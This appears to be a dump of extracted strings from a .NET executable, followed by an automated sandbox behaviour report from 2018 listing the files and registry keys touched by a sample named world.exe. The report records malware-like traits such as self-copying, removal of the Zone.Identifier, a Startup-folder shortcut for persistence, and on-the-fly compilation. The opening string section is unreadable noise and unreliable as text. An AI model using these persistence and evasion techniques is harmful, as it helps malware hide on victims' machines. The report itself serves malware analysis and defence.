6Wu?$
|6^=
f4P(
ZOaR
|0U}
Gp}!
Xd(7
l2)w_E
<msV
#jrU,}
jZ{=
>K=g|
GlaZ
x =SCP-
( ~X/
'lSZ
3lRV
tt+bTx
@%c.
11&
hcjm
hjX^o
3QWP
3hv6
;cEBM
Vd8:
\}$z
{{$iu
|R;8
G/Aw^ b
woI]!
eiCH -J ST
^K% 24
xfm3F
3|(
gqy.
kVsO4
; k|
k(`VVu
ZQ'T
$KR1
;%;P
]%nn
d*j(
uD86d
JP.C
w vp
e%~*
nx-:
>gvt
~g+d
ai<7
!|3VW
T)K!
nHp?
JyDL
7u W
#* R
aq`K~
qNZ3
`Z2r
F+#?/5/1
{~Y H3aO`
(V#O.
pb2<
A44Ct4/W
SU+Y
~;Bk
"VG/
%XJh
qAtK
`]3v
[[[{[[[
bt=q
#*"o
W4!n
)uSH
n+)%
HkK0
IDAT
|L:3
b'8#;
=XLN
f1!6
q;7K<
$DFSs
M ;V
vsxD
>GAoq
D 6{
~ 0%
<M_@
>S<Eh
yXa,m;
UnmanagedFunctionPointerAttribute
~I0
DRjW2
F jU H
1o Pd
6t~A
}zt=&
5Bey
|.",
#Zh:
#zk]
Q\y
/k'3
x%$T&
"(&9g!
t}s>X
-="LE
7@D<
P"Z_
ThNn
@ up
}Ixb
p(QBx
y|uS
e`O`]
~X>A
;4*&
}#ii
?iMD
]s-(*,
j uigtD
tIJb
Xw*X
N-%? ;h
o#>"c
Em+<
HSue.
A"K9$
>l*{(
vbpgE8!V
\8Zbat,
]>gl<
F*%K
p
p1Ts
#LKID
kv34<s
5I
{@w[
=c) x<
Y8
-gi(
=0-T
ehvV
qRZJ:
}"XD+b$
dInBT|
AOhhOG
aMj&
$@neW
$_R`
%c65
Eoi{/
Ym-T
kT+)
:@OX
+z "
1]Kp
_h8i9MA
YE?H
)a~N
~#JI>|JO
HL]x
%+)ZF=
6M`
NiHo
F{$3
{-c&
|H5q?
>085>
/zU
wWQ`
9ZsP
=%B-
|9$un>
S:LWs
\@c&
Hhn=
i8 F
g;|pI
}2Sd
H$07
4=hXOiD^x
]"?F
j .&
)VBY
`A# M
08
i0k /
e?""
j 6F
Yqg=
*y_{
R@|}
ND_Nr
tD_$@
vp#->
SSh!
Vs1
@#"T
GG`5
OT`"
EFCu
6a"8
yIz0xn$
FR7a
OZj)
io%
h?iO1
b kEgW4eq
kVk5q
C"6*
"hCo
BwtMXB-3 Z
NQAM
{O; 3
(R`F
?>"\
^u`7x
%\Y >
~j?t
5t$J
$~x5
-N_@wP7
args
KP_G
N(COT_q;
r5G$
^h N
bSkj
G_p
a;l=H5
} uKz
tI,>>3
SUS
d+FD
<Module>
{)+Q
HW+k
B2,j
j |L
35Dz"
!jJ}
,6G:
"9}5
>ct2RT
%v7$
028.N
.LE[
iss)3|
gt<d
=GCc
hD26
fu`yV
rE38
g<{;w
8~H=
m!Og]
uF{}>
wqp
M?y;
7]Ck
M d!
#S 3a
CurrencyManager
?%
)%nm
W`Bu
p6DGC
q0>x
~$"27
xAiI
'BjV
k --er
;@99
vbD
Z4;Q
g@CV
{`>d
9[3'
2 ~q
e9IA.
A[JL
zDB(
{a'T
}= )b
12^k
r| b
!Da"
T`R D
H]ed^+
].B:
\\Y z
!3 )vO!
;iD;
02Ws@
M]d=
);<zF
B%ME
3MdF
8>(
':KA
_[w6:
#GUID
CU-P
\ S?
Wd('1'
}NW@U
=R 4G
drink
fI@w8M[
?G64
ZZZ"\\\
.god
I5yqf gi
VulE
Z7(V
7 LC
Zz6dk
vLOh
%x
)Om>
7BA2
l'B
R*1G
%{A
:!7:w
D,HS
333J3
0 zI
JE^]
u.i\
L?!`y
_\n9
B 4R>
ipw
'3OS
+\:xS
P*oc
Jx9#
`Ox"
{XKe<C2
Zh8Zo#
d6]p
aU4Ol
E[`@
ylsn
''lc8h
N
UpL@4
v1]1
N|M'@
j_J"
P 1?\
xh]V
5 rvt
M{fs
Fo02
QSvP4F
F%=k
bC!yT
r`fa
n kE
Uic{J
qe*p
FtAOp
{9:V
" {*@
6W@P
[~f|
D$0)l
Y%_D
t6]-
":j<
]>Ci
3L/2
$;2
eo| {
H6&WcN
zDsn
Y(;K
T}q.|
Qs7s
~B|D
3b k
k2pJ;=
9hTJ
@Bd(t
9DEKc
- B4
=FYz
k)|~C
jD/e
/z.
%Bjl`
u_mpe`
Y?:P
Encoding
WsHL;
-\l-e.
|WH
^DC"
b|<|
sdWK
gl)g
yL=/
<9J
+ag$
QA!Ja4
MDcyL
R '?
NVil
Bt=X
@(Mf
:&n
erD=
W^| 9
W]L
m02I`
+`Pq
,S=e
N6/P-
;VYM
Z)B-
'\
}$Jyv
?n21
v& .
ZL'q
i H[
^UG#
SSl9eE
#7DC
jp,H
,Du{
RojF
aOq9
i)~%i
Gd0uVd
GP`#q+
l{O]ky
$.hm[
sz0~
*IVs
:\D/
H /a
m*N +r-7
$FPK2
*j<3
TzZd
KAq(
ctZ\56
D}]r0
[[[5
.,Qm
Mv'}
hf}Dl<
~J-:
*$`K(M
BGq;9
[[[F
zf&q
1'NB
X&@"
4MLi 6
,h<]Xxc
I|/\
$]U>
6_W1.
\#UM
[[[Q
3ex;
R ]`
$X/=
06Fy
7 uA
]JM
)w?d<
&sPht4
[[[b
w*.;y
}zp)*
FD<h^
N8F{
dTnf
b@9P
R. jZ0
<+uH
:&_g
[[[s
+I"~
m @
[[[p
}o<\
[yn;
LB2:
74fTQ
mJTR
h Lx
OQPm
kWoST
5JHi
8u4lgw
!z"t
d?*1
k&y&
U]JN
=}}}
kWc:Z
1u!*
">ND[
[[[s[[[
Y"46
F4!\
-'mT9
xsS
`HQW
eCbj
CRM4ad4zCivkN3E4.Euro.exe
:W}+
?2) 3]
7v7^
n+s'aRMl
0O=|%
L'o?
bQ#.
IEg|D
# shL
QpPP
IE:Y
p@_y
O Cb
XQ+d
D }Py
0f+>!
} >L5
y\>fg
a$~O
& 6>Z.
l'cV
lvre
O=Gp
&2D\
>CAo
@Ow>X^
_YP:W
*0)V
JLQx>
z$F=G
AE+O
h <;
:- :V[+
bLJ6
.<#7
=[j<
y`fb
I-0
z!(3
-Jm024*
8:_@
Ww4OB
G=|x
-Q-
9.G]
^K%ds
7kV35`
RQzI.
A5d\
u@4t
z%"@
U`>*<W
#y
}H9=D
VU ~XW
\3t]
c~/l
?'z-UM
{*xg
a7\}ou
_f]
E#7J
3a_d
F.+y
x\+@
T4Z&
'P35
P %F
h [T2
;u l
Xe jN
g`yq
d+MjVc/
u^6h
Q}jfI~
7bZR
zj,Z
#`Nz
"mcF
U}NQh
q /
L awX
ZDO?
>af*
vXpl(
@q"G
u3p
/N2Wb
hJFc
N"|0
ei z
edzZ
6bn
9aufPH
L&u?
gDmE
N%^*z
"AA>
A8p
6o`x
rD1;
~L[T
( 6K
Ti\S
Xk5X2-
FNIj
)+I
}XiN
89o-
SqD.
#uD!
Behavior analysis details
Machine name Machine label Machine manager Started Ended Duration
Seven05b_64 Seven05b_64 VirtualBox 2018-05-03 16:26:59 2018-05-03 16:29:49 170

8 Behaviors detected by system signatures

Behavior analysis details
Machine name Machine label Machine manager Started Ended Duration
Seven05b_64 Seven05b_64 VirtualBox 2018-05-03 16:26:59 2018-05-03 16:29:49 170

8 Summary items with data

Files

C:\Windows\System32\MSCOREE.DLL.local
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll
C:\Windows\Microsoft.NET\Framework\*
C:\Windows\Microsoft.NET\Framework\v1.0.3705\clr.dll
C:\Windows\Microsoft.NET\Framework\v1.0.3705\mscorwks.dll
C:\Windows\Microsoft.NET\Framework\v1.1.4322\clr.dll
C:\Windows\Microsoft.NET\Framework\v1.1.4322\mscorwks.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\clr.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll
C:\Users\Seven01\AppData\Local\Temp\world.exe.config
C:\Users\Seven01\AppData\Local\Temp\world.exe
C:\Users\Seven01\AppData\Local\Temp\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\System32\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\system\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\ProgramData\Oracle\Java\javapath\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\System32\wbem\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\System32\WindowsPowerShell\v1.0\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSVCR120_CLR0400.dll
C:\Windows\System32\MSVCR120_CLR0400.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoree.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config
C:\Windows\Microsoft.NET\Framework\v4.0.30319\fusion.localgac
C:\Windows\Globalization\Sorting\sortdefault.nls
C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\*
C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\96c8ba86b82ee32f586da00a8b721fda\mscorlib.ni.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\96c8ba86b82ee32f586da00a8b721fda\mscorlib.ni.dll.aux
C:\Users
C:\Users\Seven01
C:\Users\Seven01\AppData
C:\Users\Seven01\AppData\Local
C:\Users\Seven01\AppData\Local\Temp
C:\Windows\Microsoft.NET\Framework\v4.0.30319\ole32.dll
\Device\KsecDD
C:\Windows\assembly\NativeImages_v4.0.30319_32\CRM4ad4zCiv83317bde#\*
C:\Users\Seven01\AppData\Local\Temp\world.INI
C:\Windows\Microsoft.NET\Framework\v4.0.30319\clrjit.dll
C:\Windows\assembly\pubpol23.dat
C:\Windows\assembly\GAC\PublisherPolicy.tme
C:\Windows\Microsoft.Net\assembly\GAC_32\System\v4.0_4.0.0.0__b77a5c561934e089\System.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\System\*
C:\Windows\assembly\NativeImages_v4.0.30319_32\System\ea5ca00aa792b96c036a1b3d57b28f9a\System.ni.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\System\ea5ca00aa792b96c036a1b3d57b28f9a\System.ni.dll.aux
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Configuration\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Xml\v4.0_4.0.0.0__b77a5c561934e089\System.Xml.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\nlssorting.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\SortDefault.nlp
C:\Users\Seven01\AppData\Local\Temp\nlnlcpkb.tmp
C:\Users\Seven01\AppData\Local\Temp\nlnlcpkb.0.cs
C:\Users\Seven01\AppData\Local\Temp\nlnlcpkb.dll
C:\Users\Seven01\AppData\Local\Temp\nlnlcpkb.cmdline
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
C:\Users\Seven01\AppData\Local\Temp\nlnlcpkb.out
C:\Users\Seven01\AppData\Local\Temp\nlnlcpkb.err
C:\Users\Seven01\AppData\Local\Temp\nlnlcpkb.pdb
C:\Windows\Microsoft.Net\assembly\GAC_32\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\*
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\00ea0c71c0a045ebceae2b3d938d251f\System.Drawing.ni.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\00ea0c71c0a045ebceae2b3d938d251f\System.Drawing.ni.dll.aux
C:\Users\Seven01\AppData\Local\Temp\world.exe.Local\
C:\Windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80
C:\Windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\GdiPlus.dll
C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\shell32.dll
C:\Users\Seven01\world.exe
C:\Users\Seven01\world.exe:Zone.Identifier
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dIQVAO.url
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.Net\assembly\GAC_32\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851#\*
C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851#\feeacef715fd335a37a58022b3a2fefb\Microsoft.VisualBasic.ni.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851#\feeacef715fd335a37a58022b3a2fefb\Microsoft.VisualBasic.ni.dll.aux
C:\Windows\Microsoft.Net\assembly\GAC_32\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\*
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8811a034e0362a8ec740c44c7136725b\System.Core.ni.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8811a034e0362a8ec740c44c7136725b\System.Core.ni.dll.aux
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Xml.Linq\v4.0_4.0.0.0__b77a5c561934e089\System.Xml.Linq.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\ntdll.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\1040\cscui.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\1040\cscui.dll.DLL
C:\Windows\Microsoft.NET\Framework\v4.0.30319\0\cscui.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\0\cscui.dll.DLL
C:\Windows\Microsoft.NET\Framework\v4.0.30319\1033\cscui.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\default.win32manifest
C:\Windows\Microsoft.NET\Framework\v4.0.30319\alink.dll
C:\Windows\System32\mscoree.dll.local
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe.config
C:\Windows\Microsoft.NET\Framework\v4.0.30319\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Users\Seven01\AppData\Local\Temp\System.Management.dll
C:\Windows
C:\Windows\Microsoft.NET
C:\Windows\Microsoft.NET\Framework
C:\Windows\Microsoft.NET\Framework\v4.0.30319
C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.Management.dll
C:\Users\Seven01\AppData\Local\Temp\System.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.dll
C:\Users\Seven01\AppData\Local\Temp\System.Drawing.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.Drawing.dll
C:\Users\Seven01\AppData\Local\Temp\System.Core.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.Core.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorpehost.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\diasymreader.dll
C:\Users\Seven01\AppData\Local\Temp\CSC8433AF33BDC4010A2A509683359DD.TMP
C:\Users\Seven01\AppData\Local\Temp\RES1CAB.tmp
C:\Windows\System32\tzres.dll

Read Files

C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll
C:\Users\Seven01\AppData\Local\Temp\world.exe.config
C:\Users\Seven01\AppData\Local\Temp\world.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll
C:\Windows\System32\MSVCR120_CLR0400.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config
C:\Windows\Globalization\Sorting\sortdefault.nls
C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\96c8ba86b82ee32f586da00a8b721fda\mscorlib.ni.dll.aux
C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\96c8ba86b82ee32f586da00a8b721fda\mscorlib.ni.dll
\Device\KsecDD
C:\Windows\Microsoft.NET\Framework\v4.0.30319\clrjit.dll
C:\Windows\assembly\pubpol23.dat
C:\Windows\assembly\NativeImages_v4.0.30319_32\System\ea5ca00aa792b96c036a1b3d57b28f9a\System.ni.dll.aux
C:\Windows\assembly\NativeImages_v4.0.30319_32\System\ea5ca00aa792b96c036a1b3d57b28f9a\System.ni.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\nlssorting.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\SortDefault.nlp
C:\Users\Seven01\AppData\Local\Temp\nlnlcpkb.dll
C:\Users\Seven01\AppData\Local\Temp\nlnlcpkb.pdb
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\00ea0c71c0a045ebceae2b3d938d251f\System.Drawing.ni.dll.aux
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\00ea0c71c0a045ebceae2b3d938d251f\System.Drawing.ni.dll
C:\Windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\GdiPlus.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851#\feeacef715fd335a37a58022b3a2fefb\Microsoft.VisualBasic.ni.dll.aux
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8811a034e0362a8ec740c44c7136725b\System.Core.ni.dll.aux
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8811a034e0362a8ec740c44c7136725b\System.Core.ni.dll
C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851#\feeacef715fd335a37a58022b3a2fefb\Microsoft.VisualBasic.ni.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\1033\cscui.dll
C:\Users\Seven01\AppData\Local\Temp\nlnlcpkb.cmdline
C:\Windows\Microsoft.NET\Framework\v4.0.30319\alink.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe.config
C:\Users\Seven01\AppData\Local\Temp\nlnlcpkb.0.cs
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.Management.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.Drawing.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.Core.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorpehost.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\diasymreader.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\default.win32manifest
C:\Users\Seven01\AppData\Local\Temp\CSC8433AF33BDC4010A2A509683359DD.TMP
C:\Users\Seven01\AppData\Local\Temp\RES1CAB.tmp
C:\Windows\System32\tzres.dll

Write Files

C:\Users\Seven01\AppData\Local\Temp\nlnlcpkb.tmp
C:\Users\Seven01\AppData\Local\Temp\nlnlcpkb.0.cs
C:\Users\Seven01\AppData\Local\Temp\nlnlcpkb.dll
C:\Users\Seven01\AppData\Local\Temp\nlnlcpkb.cmdline
C:\Users\Seven01\AppData\Local\Temp\nlnlcpkb.out
C:\Users\Seven01\AppData\Local\Temp\nlnlcpkb.err
C:\Users\Seven01\world.exe
C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dIQVAO.url
C:\Users\Seven01\AppData\Local\Temp\nlnlcpkb.pdb
C:\Users\Seven01\AppData\Local\Temp\CSC8433AF33BDC4010A2A509683359DD.TMP
C:\Users\Seven01\AppData\Local\Temp\RES1CAB.tmp

Delete Files

C:\Users\Seven01\AppData\Local\Temp\nlnlcpkb.tmp
C:\Users\Seven01\AppData\Local\Temp\nlnlcpkb.out
C:\Users\Seven01\AppData\Local\Temp\nlnlcpkb.err
C:\Users\Seven01\AppData\Local\Temp\nlnlcpkb.pdb
C:\Users\Seven01\AppData\Local\Temp\nlnlcpkb.dll
C:\Users\Seven01\AppData\Local\Temp\nlnlcpkb.cmdline
C:\Users\Seven01\AppData\Local\Temp\nlnlcpkb.0.cs
C:\Users\Seven01\world.exe:Zone.Identifier
C:\Users\Seven01\AppData\Local\Temp\RES1CAB.tmp
C:\Users\Seven01\AppData\Local\Temp\CSC8433AF33BDC4010A2A509683359DD.TMP

Keys

HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\Policy\
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\v4.0
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\InstallRoot
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\CLRLoadLogDir
HKEY_CURRENT_USER\Software\Microsoft\.NETFramework
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\UseLegacyV2RuntimeActivationPolicyDefaultValue
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\OnlyUseLatestCLR
Policy\Standards
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\Standards
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\Standards\v4.0.30319
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Fusion\NoClientChecks
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\v4.0.30319\SKUs\
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\v4.0.30319\SKUs\default
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP\v4\Full
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\NET Framework Setup\NDP\v4\Full\Release
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\DisableConfigCache
HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\world.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\CacheLocation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DownloadCacheQuotaInKB
HKEY_CURRENT_USER\Software\Microsoft\Fusion
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\EnableLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LoggingLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\ForceLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogFailures
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogResourceBinds
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\FileInUseRetryAttempts
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\FileInUseMillisecondsBetweenRetries
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\UseLegacyIdentityFormat
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DisableMSIPeek
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DevOverrideEnable
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\NGen\Policy\v4.0
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\NGen\Policy\v4.0\OptimizeUsedBinaries
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Policy\Servicing
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\it-IT
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\it-IT
HKEY_LOCAL_MACHINE\Software\Microsoft\StrongName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLEAUT
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\AltJit
HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion\PublisherPolicy\Default
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\Latest
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\index23
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\LegacyPolicyTimeStamp
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Configuration__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Configuration__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Xml__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Xml__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Policy\APTCA
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale\Alternate Sorts
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Language Groups
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000410
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Language Groups\1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Defaults\Provider Types\Type 024
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\Defaults\Provider Types\Type 024\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Drawing__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Drawing__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\SideBySide\AssemblyStorageRoots
HKEY_CLASSES_ROOT\CLSID\{FAE3D380-FEA4-4623-8C75-C6B61110B681}\Instance
HKEY_CLASSES_ROOT\CLSID\{FAE3D380-FEA4-4623-8C75-C6B61110B681}\Instance\Disabled
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.10.0.Microsoft.VisualBasic__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.10.0.Microsoft.VisualBasic__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\v4.0_policy.4.0.System.Core__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.4.0.System.Core__b77a5c561934e089
